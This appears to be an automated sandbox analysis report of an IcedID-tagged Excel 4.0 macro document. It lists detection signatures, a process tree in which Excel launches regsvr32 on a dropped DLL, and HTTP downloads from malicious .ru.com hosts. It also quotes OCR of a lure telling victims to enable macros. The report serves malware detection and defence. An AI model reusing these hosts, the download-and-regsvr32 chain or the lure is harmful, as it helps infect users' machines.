Loading ...

Play interactive tourEdit tour

Analysis Report documents-1819557117.xlsm

Overview

General Information

Sample Name:documents-1819557117.xlsm
Analysis ID:384703
MD5:4dd14d22cd0272ae24128bb1356a842c
SHA1:abf7d941f4ebf949816c5576060bfce76f836ae9
SHA256:f06910daadc7c66c8e9064d0719ed6727d69c1f04ab13566cadbb6e7a9f52a7e
Tags:IcedIDXLSM
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5520 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6436 cmdline: regsvr32 -s ..\ghnrope MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6444 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6456 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6480 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6500 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifReversingLabs: Detection: 12%
    Source: C:\Users\user\ghnrope2.dllReversingLabs: Detection: 12%
    Multi AV Scanner detection for submitted fileShow sources
    Source: documents-1819557117.xlsmReversingLabs: Detection: 10%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.5:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.5:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.5:49710 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 0604[1].gif.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficDNS query: name: runolfsson-jayde07s.ru.com
    Source: global trafficTCP traffic: 192.168.2.5:49708 -> 162.251.80.27:443
    Source: global trafficTCP traffic: 192.168.2.5:49705 -> 8.211.4.209:80
    Source: Joe Sandbox ViewIP Address: 162.251.80.27 162.251.80.27
    Source: Joe Sandbox ViewIP Address: 8.211.4.209 8.211.4.209
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cremin-ian07u.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cremin-ian07u.ru.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: runolfsson-jayde07s.ru.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Fri, 09 Apr 2021 14:32:49 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 76Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.cortana.ai
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.office.net
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.onedrive.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://augloop.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://cdn.entity.
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://cortana.ai
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://cortana.ai/api
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://cr.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://directory.services.
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://graph.windows.net
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://graph.windows.net/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://login.windows.local
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://management.azure.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://management.azure.com/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://messaging.office.com/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://officeapps.live.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://onedrive.live.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://outlook.office.com/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://settings.outlook.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://tasks.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownHTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.5:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.5:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.5:49710 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above O WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS
    Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 15Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
    Source: Document image extraction number: 15Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: documents-1819557117.xlsmInitial sample: CALL
